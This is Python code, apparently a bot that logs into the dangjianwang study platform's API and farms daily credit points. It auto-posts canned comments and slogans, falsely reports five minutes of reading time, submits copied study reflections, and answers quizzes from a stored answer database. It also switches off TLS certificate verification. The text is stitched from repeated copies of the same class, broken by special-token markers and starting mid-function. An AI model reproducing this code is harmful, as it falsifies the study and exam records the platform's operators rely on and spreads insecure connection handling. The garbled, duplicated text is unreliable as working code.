correctAnswer = Qa.objects.filter(question__contains=i['content'])[
0]
answerText = correctAnswer.answerText
answer = correctAnswer.answer
temp = {'index': i['id'], 'answer': answer}
qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}
self.qaList.append(qa)
print(qa, i['content'])
answers.append(temp)
time.sleep(1)
hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,
'answers': json.dumps(answers)}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'
rjson = self.session.post(url=commitUrl, data=hdata, verify=False
).json()
print(rjson)
print(self.examlist)
print(self.examC19Info)
print(self.qaList)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Runner:
def __init__(self, appid='TJZHDJ01', username='', password=''):
urllib3.disable_warnings()
self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')
self.username = username
self.password = password
self.thumbedFilePath = './lib/'.format(username)
self.logFilePath = './log/'.format(username)
self.errFilePath = './err/'.format(username)
self.thumbedFileList = []
self.debug = True
self.session = requests.session()
self.appid = appid
self.headers = {'User-Agent':
'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'
, 'header_version': '80', 'system': 'android', 'Connection':
'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}
self.token = self.getToken()
time.sleep(0.1)
self.thumbPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Learn/List',
'https://mapi.dangjianwang.com/v3_1/Activities/List',
'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])
self.thumbPages = [i[1] for i in self.thumbPageList]
time.sleep(0.1)
self.helpPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Help/List'])
self.helpPages = [i[1] for i in self.helpPageList]
self.helpResults = {}
time.sleep(0.1)
self.studyPageList = self.getPagesII(urls=[
'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])
self.studyPages = [i[1] for i in self.studyPageList]
time.sleep(0.1)
self.studyRsults = {}
self.thumbedPages = []
self.thumbResults = {}
self.helpedPages = []
self.multiThumbed = []
self.viewsResults = []
self.examC19Info = []
self.examlist = []
self.qaList = []
<|reserved_special_token_0|>
def writeErr2File(self, err):
path = self.logFilePath
fullPath = '{}{}err.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, err))
print('err已经写入{}'.format(fullPath))
def writeLog2File(self, log):
path = self.logFilePath
fullPath = '{}{}logs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, log))
print('log已经写入{}'.format(fullPath))
def writeThumb2File(self, id):
path = self.thumbedFilePath
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write(',{}'.format(id))
print('点赞记录已经写入{}'.format(fullPath))
def getThumbFromFile(self):
"""
:return: 文件中id组成的列表
"""
path = self.thumbedFilePath
inFileList = []
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(fullPath):
return fullPath
with open(fullPath, 'r') as f:
inFileList.extend(list(set(f.readlines()[0].split(','))))
with open(fullPath, 'w') as f1:
f1.write(','.join(sorted(inFileList)))
return inFileList
def getExcuteTimes(self):
"""
返回点赞等自动执行的次数的字典
:return:
"""
excuteTimes = {}
credInfo = self.getCredItinfo()
print(credInfo)
currentScore = credInfo[0]
thumbScore = credInfo[1]['信息评论'].split('/')[0]
thumbExcuteTimes = 10 - int(thumbScore)
excuteTimes.update({'thumb': thumbExcuteTimes})
helpScore = credInfo[1]['互助广场回答'].split('/')[0]
helpExctuteTimes = 2 - int(helpScore)
excuteTimes.update({'help': helpExctuteTimes})
viewScore = credInfo[1]['党员视角发布'].split('/')[0]
viewExcuteTimes = int((4 - int(viewScore)) / 2)
excuteTimes.update({'view': viewExcuteTimes})
examScore = credInfo[1]['在线知识竞答'].split('/')[0]
examExcuteTimes = int((4 - int(examScore)) / 2)
excuteTimes.update({'exam': examExcuteTimes})
flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]
['在线阅读学习资料'].split('/')[0])
flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]
['学习资料写体会'].split('/')[0])
examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0
excuteTimes.update({'study': examExcuteTimes})
return excuteTimes
def getToken(self):
"""
获得一个连接的token
每个连接都需要使用到
:return:
"""
data = {'appid': self.appid, 'username': self.username, 'password':
self.password}
longinurl = 'https://mapi.dangjianwang.com/v3_1/login'
r = self.session.post(url=longinurl, data=data, verify=False)
rjson = r.json()
if rjson['code'] == '200':
return rjson['token']
else:
print('token 获得失败')
return None
def getRJson(self, url):
data = {'token': self.token, 'appid': self.appid}
return self.session.post(url=url, data=data, verify=False).json()
def getUserInfo(self):
"""
获得一大串用户的信息,暂时没用
:return:
"""
infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'
return self.getRJson(url=infoUrl)
def getCredItinfoToday(self):
"""
获得人员当前的得分等级参数
:return:
"""
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
info = self.getRJson(url=creditInfourl)
fullScore = info['data']['full']
gainScore = info['data']['gain']
currentLevel = info['data']['level']
username = info['data']['name']
ret = {'fullScore': fullScore, 'gainScore': gainScore,
'currentLevel': currentLevel, 'username': username}
return ret
def getCredItinfo(self):
"""
获得用户的今日积分状态
可用来判断是否需要再继续流程
数据如下
('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])
:return:(haved_credit, credit_detail)
"""
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
haved_credit = 0
credit_detail = {}
info = self.getRJson(url=creditInfourl)
for k, v in info.items():
if k == 'data':
for k2, v2 in v.items():
if k2 == 'haved_credit':
haved_credit = v2
if k2 == 'credit_detail':
for i in v2:
credit_detail.update({i['title']: i['score']})
return haved_credit, credit_detail
def getPages(self, urls):
pages = []
for url in urls:
data = self.getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
pages.append((i['title'], i['id']))
return pages
def getPagesII(self, urls):
def getRJson(url):
data = {'token': self.token, 'appid': self.appid, 'type_id':
'791', 'page_index': '1'}
return self.session.post(url=url, data=data, verify=False).json()
pages = []
for url in urls:
data = getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
pages.append((i['name'], i['id']))
return pages
def doThumb(self, id):
"""
点赞函数,操作与id对应的页面
每次记录对应的信息到文件
:return:
"""
contents = ['关注', '关注!', '关注!!']
data = {'id': id, 'comment': random.choice(contents), 'token': self
.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
print(rjson)
if rjson['code'] == '1003':
self.token = self.getToken()
elif rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.thumbedPages.append(id)
for i in list(set(self.thumbPageList)):
if id == i[1]:
temp = {'title': i[0]}
self.thumbResults.update(temp)
log = '信息点赞:\n主题: {}\n提交:{}'.format(i[0], data[
'comment'])
detail = '{} 主题:{}\n回复:{}\n'.format(self.
getCurrentTime(), i[0], data['comment'])
write2File(self, './results/', 'result.txt', log)
thumbInfo = {'title': i[0], 'reply': data['comment']}
self.thumbPages.remove(id)
self.writeThumb2File(id=id)
return detail, thumbInfo
elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':
print('因评论过快,等待一段时间')
time.sleep(20)
else:
print('rjson', rjson)
self.thumbedPages.remove(id)
self.writeThumb2File(id=id)
log = '点赞:{}'.format(rjson)
self.writeLog2File(log)
print(log)
time.sleep(10)
def doHelp(self, id, callback=None):
"""
互助功能
:param id:
:return:
"""
detail = ''
helpInfo = None
log = ''
content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',
'要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']
data = {'id': id, 'content': random.choice(content), 'token': self.
token, 'appid': self.appid}
print(data)
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.helpedPages.append(id)
self.helpPages.remove(id)
for i in self.helpPageList:
if id == i[1]:
curTime = self.getCurrentTime()
self.helpResults.update({'title': id[0]})
log = '互助:\n主题: {}\n提交内容: {}'.format(i[0], rjson[
'comment'])
write2File(self, './results/', 'result.txt', log)
detail = '{} 主题: {}\n提交内容: {}\n'.format(curTime, i[
0], rjson['comment'].strip())
helpInfo = {'title': i[0], 'reply': rjson['comment']}
else:
pass
else:
pass
log = '帮助:{}'.format(rjson)
self.writeLog2File(log)
print(log)
return detail, log, helpInfo
def doView(self):
"""
党员视角发布功能
:return:
"""
content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']
data = {'content': random.choice(content), 'token': self.token,
'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.viewsResults.append(1)
else:
pass
log = '党员视角:{}'.format(rjson)
detail = '{} 党员视角:\n发布内容:{}\n'.format(self.getCurrentTime(), rjson[
'data']['content'])
publicContent = rjson['data']['content']
return detail, publicContent
def doStudy(self, mid):
"""
前三个post函数的响应的三个请求
get用来获得填写的内容
最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。
:param mid:
:return:
"""
interval = 60 * 5 + 5
def post1():
data = {'mid': mid, 'token': self.token, 'appid': self.appid}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post1:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post2():
data = {'token': self.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post2:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post3():
data = {'mid': mid, 'token': self.token, 'appid': self.appid}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post3:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def get1():
url = (
'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'
.format(self.token, mid))
rjson = self.session.get(url=url)
text = rjson.content
soup = BeautifulSoup(text, 'html.parser')
retContents = []
for div in soup.find_all('p'):
p = div.text.strip()
retContents.append(p if 100 > len(p) < 200 else p[0:200])
return random.choice(retContents)
def recordFeeling(content=None):
if not content:
content = (
'伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'
)
data = {'mid': mid, 'token': self.token, 'appid': self.appid,
'content': content}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习recordFeeling:{}'.format(rjson)
self.writeLog2File(log)
print('in recordFeeling')
print(log)
if rjson['code'] == '200':
return {'content': content}
elif rjson['code'] == '1120':
addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',
'人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',
'民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']
return recordFeeling(content='{}\n{}'.format(content,
random.choice(addtion)))
else:
return None
def readTime():
data = {'mid': mid, 'token': self.token, 'appid': self.appid,
'time': interval}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习readTime:{}'.format(rjson)
self.writeLog2File(log)
print(log)
post1()
time.sleep(1)
post2()
time.sleep(1)
post3()
time.sleep(1)
content = get1()
time.sleep(1)
count = 0
print('开始学习请稍后')
for i in range(interval):
count += 1
if count % 30 == 0:
print('已用时{}秒'.format(count))
time.sleep(1)
print('填写的学习体会', content)
self.studyRsults.update(recordFeeling(content=content))
time.sleep(1)
readTime()
time.sleep(1)
pass
def doExam(self):
"""
:param self:
:return:
"""
ids = []
data = {'page': '1', 'page_size': '20', 'token': self.token,
'appid': self.appid}
examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'
rjson = self.session.post(url=examlistUrl, data=data, verify=False
).json()
time.sleep(0.3)
print('*' * 99)
data = {'page': '1', 'page_size': '20', 'token': self.token,
'appid': self.appid}
banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'
rjson = self.session.post(url=banklistUrl, data=data, verify=False
).json()
for i in rjson['data']:
tem = i['bank_name'], i['id']
self.examlist.append(tem)
if i['bank_name'] == '十九大报告100题(单选)':
temp = {'title': i['bank_name'], 'detail': i['detail'],
'id': i['id']}
self.examC19Info.append(temp)
time.sleep(0.3)
print('*' * 99)
data = {'bank': '6', 'token': self.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
aa = rjson['data']
paper = aa['id']
for i in aa['questions']:
temp = {'id': i['id'], 'content': i['content']}
ids.append(temp)
print('*' * 99)
time.sleep(0.5)
answers = []
for i in ids:
correctAnswer = Qa.objects.filter(question__contains=i['content'])[
0]
answerText = correctAnswer.answerText
answer = correctAnswer.answer
temp = {'index': i['id'], 'answer': answer}
qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}
self.qaList.append(qa)
print(qa, i['content'])
answers.append(temp)
time.sleep(1)
hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,
'answers': json.dumps(answers)}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'
rjson = self.session.post(url=commitUrl, data=hdata, verify=False
).json()
print(rjson)
print(self.examlist)
print(self.examC19Info)
print(self.qaList)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Runner:
def __init__(self, appid='TJZHDJ01', username='', password=''):
urllib3.disable_warnings()
self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')
self.username = username
self.password = password
self.thumbedFilePath = './lib/'.format(username)
self.logFilePath = './log/'.format(username)
self.errFilePath = './err/'.format(username)
self.thumbedFileList = []
self.debug = True
self.session = requests.session()
self.appid = appid
self.headers = {'User-Agent':
'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'
, 'header_version': '80', 'system': 'android', 'Connection':
'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}
self.token = self.getToken()
time.sleep(0.1)
self.thumbPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Learn/List',
'https://mapi.dangjianwang.com/v3_1/Activities/List',
'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])
self.thumbPages = [i[1] for i in self.thumbPageList]
time.sleep(0.1)
self.helpPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Help/List'])
self.helpPages = [i[1] for i in self.helpPageList]
self.helpResults = {}
time.sleep(0.1)
self.studyPageList = self.getPagesII(urls=[
'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])
self.studyPages = [i[1] for i in self.studyPageList]
time.sleep(0.1)
self.studyRsults = {}
self.thumbedPages = []
self.thumbResults = {}
self.helpedPages = []
self.multiThumbed = []
self.viewsResults = []
self.examC19Info = []
self.examlist = []
self.qaList = []
<|reserved_special_token_0|>
def writeErr2File(self, err):
path = self.logFilePath
fullPath = '{}{}err.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, err))
print('err已经写入{}'.format(fullPath))
def writeLog2File(self, log):
path = self.logFilePath
fullPath = '{}{}logs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, log))
print('log已经写入{}'.format(fullPath))
def writeThumb2File(self, id):
path = self.thumbedFilePath
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write(',{}'.format(id))
print('点赞记录已经写入{}'.format(fullPath))
def getThumbFromFile(self):
"""
:return: 文件中id组成的列表
"""
path = self.thumbedFilePath
inFileList = []
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(fullPath):
return fullPath
with open(fullPath, 'r') as f:
inFileList.extend(list(set(f.readlines()[0].split(','))))
with open(fullPath, 'w') as f1:
f1.write(','.join(sorted(inFileList)))
return inFileList
def getExcuteTimes(self):
"""
返回点赞等自动执行的次数的字典
:return:
"""
excuteTimes = {}
credInfo = self.getCredItinfo()
print(credInfo)
currentScore = credInfo[0]
thumbScore = credInfo[1]['信息评论'].split('/')[0]
thumbExcuteTimes = 10 - int(thumbScore)
excuteTimes.update({'thumb': thumbExcuteTimes})
helpScore = credInfo[1]['互助广场回答'].split('/')[0]
helpExctuteTimes = 2 - int(helpScore)
excuteTimes.update({'help': helpExctuteTimes})
viewScore = credInfo[1]['党员视角发布'].split('/')[0]
viewExcuteTimes = int((4 - int(viewScore)) / 2)
excuteTimes.update({'view': viewExcuteTimes})
examScore = credInfo[1]['在线知识竞答'].split('/')[0]
examExcuteTimes = int((4 - int(examScore)) / 2)
excuteTimes.update({'exam': examExcuteTimes})
flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]
['在线阅读学习资料'].split('/')[0])
flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]
['学习资料写体会'].split('/')[0])
examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0
excuteTimes.update({'study': examExcuteTimes})
return excuteTimes
def getToken(self):
"""
获得一个连接的token
每个连接都需要使用到
:return:
"""
data = {'appid': self.appid, 'username': self.username, 'password':
self.password}
longinurl = 'https://mapi.dangjianwang.com/v3_1/login'
r = self.session.post(url=longinurl, data=data, verify=False)
rjson = r.json()
if rjson['code'] == '200':
return rjson['token']
else:
print('token 获得失败')
return None
def getRJson(self, url):
data = {'token': self.token, 'appid': self.appid}
return self.session.post(url=url, data=data, verify=False).json()
def getUserInfo(self):
"""
获得一大串用户的信息,暂时没用
:return:
"""
infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'
return self.getRJson(url=infoUrl)
def getCredItinfoToday(self):
"""
获得人员当前的得分等级参数
:return:
"""
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
info = self.getRJson(url=creditInfourl)
fullScore = info['data']['full']
gainScore = info['data']['gain']
currentLevel = info['data']['level']
username = info['data']['name']
ret = {'fullScore': fullScore, 'gainScore': gainScore,
'currentLevel': currentLevel, 'username': username}
return ret
def getCredItinfo(self):
"""
获得用户的今日积分状态
可用来判断是否需要再继续流程
数据如下
('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])
:return:(haved_credit, credit_detail)
"""
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
haved_credit = 0
credit_detail = {}
info = self.getRJson(url=creditInfourl)
for k, v in info.items():
if k == 'data':
for k2, v2 in v.items():
if k2 == 'haved_credit':
haved_credit = v2
if k2 == 'credit_detail':
for i in v2:
credit_detail.update({i['title']: i['score']})
return haved_credit, credit_detail
def getPages(self, urls):
pages = []
for url in urls:
data = self.getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
pages.append((i['title'], i['id']))
return pages
def getPagesII(self, urls):
def getRJson(url):
data = {'token': self.token, 'appid': self.appid, 'type_id':
'791', 'page_index': '1'}
return self.session.post(url=url, data=data, verify=False).json()
pages = []
for url in urls:
data = getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
pages.append((i['name'], i['id']))
return pages
def doThumb(self, id):
"""
点赞函数,操作与id对应的页面
每次记录对应的信息到文件
:return:
"""
contents = ['关注', '关注!', '关注!!']
data = {'id': id, 'comment': random.choice(contents), 'token': self
.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
print(rjson)
if rjson['code'] == '1003':
self.token = self.getToken()
elif rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.thumbedPages.append(id)
for i in list(set(self.thumbPageList)):
if id == i[1]:
temp = {'title': i[0]}
self.thumbResults.update(temp)
log = '信息点赞:\n主题: {}\n提交:{}'.format(i[0], data[
'comment'])
detail = '{} 主题:{}\n回复:{}\n'.format(self.
getCurrentTime(), i[0], data['comment'])
write2File(self, './results/', 'result.txt', log)
thumbInfo = {'title': i[0], 'reply': data['comment']}
self.thumbPages.remove(id)
self.writeThumb2File(id=id)
return detail, thumbInfo
elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':
print('因评论过快,等待一段时间')
time.sleep(20)
else:
print('rjson', rjson)
self.thumbedPages.remove(id)
self.writeThumb2File(id=id)
log = '点赞:{}'.format(rjson)
self.writeLog2File(log)
print(log)
time.sleep(10)
def doHelp(self, id, callback=None):
"""
互助功能
:param id:
:return:
"""
detail = ''
helpInfo = None
log = ''
content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',
'要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']
data = {'id': id, 'content': random.choice(content), 'token': self.
token, 'appid': self.appid}
print(data)
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.helpedPages.append(id)
self.helpPages.remove(id)
for i in self.helpPageList:
if id == i[1]:
curTime = self.getCurrentTime()
self.helpResults.update({'title': id[0]})
log = '互助:\n主题: {}\n提交内容: {}'.format(i[0], rjson[
'comment'])
write2File(self, './results/', 'result.txt', log)
detail = '{} 主题: {}\n提交内容: {}\n'.format(curTime, i[
0], rjson['comment'].strip())
helpInfo = {'title': i[0], 'reply': rjson['comment']}
else:
pass
else:
pass
log = '帮助:{}'.format(rjson)
self.writeLog2File(log)
print(log)
return detail, log, helpInfo
def doView(self):
"""
党员视角发布功能
:return:
"""
content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']
data = {'content': random.choice(content), 'token': self.token,
'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.viewsResults.append(1)
else:
pass
log = '党员视角:{}'.format(rjson)
detail = '{} 党员视角:\n发布内容:{}\n'.format(self.getCurrentTime(), rjson[
'data']['content'])
publicContent = rjson['data']['content']
return detail, publicContent
def doStudy(self, mid):
"""
前三个post函数的响应的三个请求
get用来获得填写的内容
最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。
:param mid:
:return:
"""
interval = 60 * 5 + 5
def post1():
data = {'mid': mid, 'token': self.token, 'appid': self.appid}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post1:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post2():
data = {'token': self.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post2:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post3():
data = {'mid': mid, 'token': self.token, 'appid': self.appid}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post3:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def get1():
url = (
'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'
.format(self.token, mid))
rjson = self.session.get(url=url)
text = rjson.content
soup = BeautifulSoup(text, 'html.parser')
retContents = []
for div in soup.find_all('p'):
p = div.text.strip()
retContents.append(p if 100 > len(p) < 200 else p[0:200])
return random.choice(retContents)
def recordFeeling(content=None):
if not content:
content = (
'伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'
)
data = {'mid': mid, 'token': self.token, 'appid': self.appid,
'content': content}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习recordFeeling:{}'.format(rjson)
self.writeLog2File(log)
print('in recordFeeling')
print(log)
if rjson['code'] == '200':
return {'content': content}
elif rjson['code'] == '1120':
addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',
'人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',
'民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']
return recordFeeling(content='{}\n{}'.format(content,
random.choice(addtion)))
else:
return None
def readTime():
data = {'mid': mid, 'token': self.token, 'appid': self.appid,
'time': interval}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习readTime:{}'.format(rjson)
self.writeLog2File(log)
print(log)
post1()
time.sleep(1)
post2()
time.sleep(1)
post3()
time.sleep(1)
content = get1()
time.sleep(1)
count = 0
print('开始学习请稍后')
for i in range(interval):
count += 1
if count % 30 == 0:
print('已用时{}秒'.format(count))
time.sleep(1)
print('填写的学习体会', content)
self.studyRsults.update(recordFeeling(content=content))
time.sleep(1)
readTime()
time.sleep(1)
pass
def doExam(self):
"""
:param self:
:return:
"""
ids = []
data = {'page': '1', 'page_size': '20', 'token': self.token,
'appid': self.appid}
examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'
rjson = self.session.post(url=examlistUrl, data=data, verify=False
).json()
time.sleep(0.3)
print('*' * 99)
data = {'page': '1', 'page_size': '20', 'token': self.token,
'appid': self.appid}
banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'
rjson = self.session.post(url=banklistUrl, data=data, verify=False
).json()
for i in rjson['data']:
tem = i['bank_name'], i['id']
self.examlist.append(tem)
if i['bank_name'] == '十九大报告100题(单选)':
temp = {'title': i['bank_name'], 'detail': i['detail'],
'id': i['id']}
self.examC19Info.append(temp)
time.sleep(0.3)
print('*' * 99)
data = {'bank': '6', 'token': self.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
aa = rjson['data']
paper = aa['id']
for i in aa['questions']:
temp = {'id': i['id'], 'content': i['content']}
ids.append(temp)
print('*' * 99)
time.sleep(0.5)
answers = []
for i in ids:
correctAnswer = Qa.objects.filter(question__contains=i['content'])[
0]
answerText = correctAnswer.answerText
answer = correctAnswer.answer
temp = {'index': i['id'], 'answer': answer}
qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}
self.qaList.append(qa)
print(qa, i['content'])
answers.append(temp)
time.sleep(1)
hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,
'answers': json.dumps(answers)}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'
rjson = self.session.post(url=commitUrl, data=hdata, verify=False
).json()
print(rjson)
print(self.examlist)
print(self.examC19Info)
print(self.qaList)
def getAnswerInfo(self):
"""
获得答题的结果与正确率
:return:
"""
data = {'token': self.token, 'appid': self.appid, 'page_size': '20',
'page_index': 'page_index'}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
print(rjson)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Runner:
def __init__(self, appid='TJZHDJ01', username='', password=''):
urllib3.disable_warnings()
self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')
self.username = username
self.password = password
self.thumbedFilePath = './lib/'.format(username)
self.logFilePath = './log/'.format(username)
self.errFilePath = './err/'.format(username)
self.thumbedFileList = []
